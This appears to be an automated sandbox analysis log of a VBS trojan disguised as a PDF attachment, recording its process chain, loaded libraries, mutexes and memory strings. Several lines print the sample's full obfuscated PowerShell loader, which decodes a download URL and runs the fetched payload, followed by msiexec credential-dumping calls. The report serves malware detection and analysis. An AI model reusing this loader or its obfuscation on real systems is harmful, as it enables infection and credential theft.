Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
Source: MV STARSHIP AQUILA_pdf.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5227
Source: unknown Process created: Commandline size = 5227
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5227 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@18/10@2/3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 10_2_004182CE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 13_2_00410DE1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 10_2_00418758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, 10_2_00413D4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource, 10_2_004148B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Plasmagel.Ref Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2aep3m4.xfw.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs"
Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4948
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2060
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 00000008.00000002.3028615098.00000000200B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe, 0000000A.00000003.2193037694.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194835668.00000000008EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
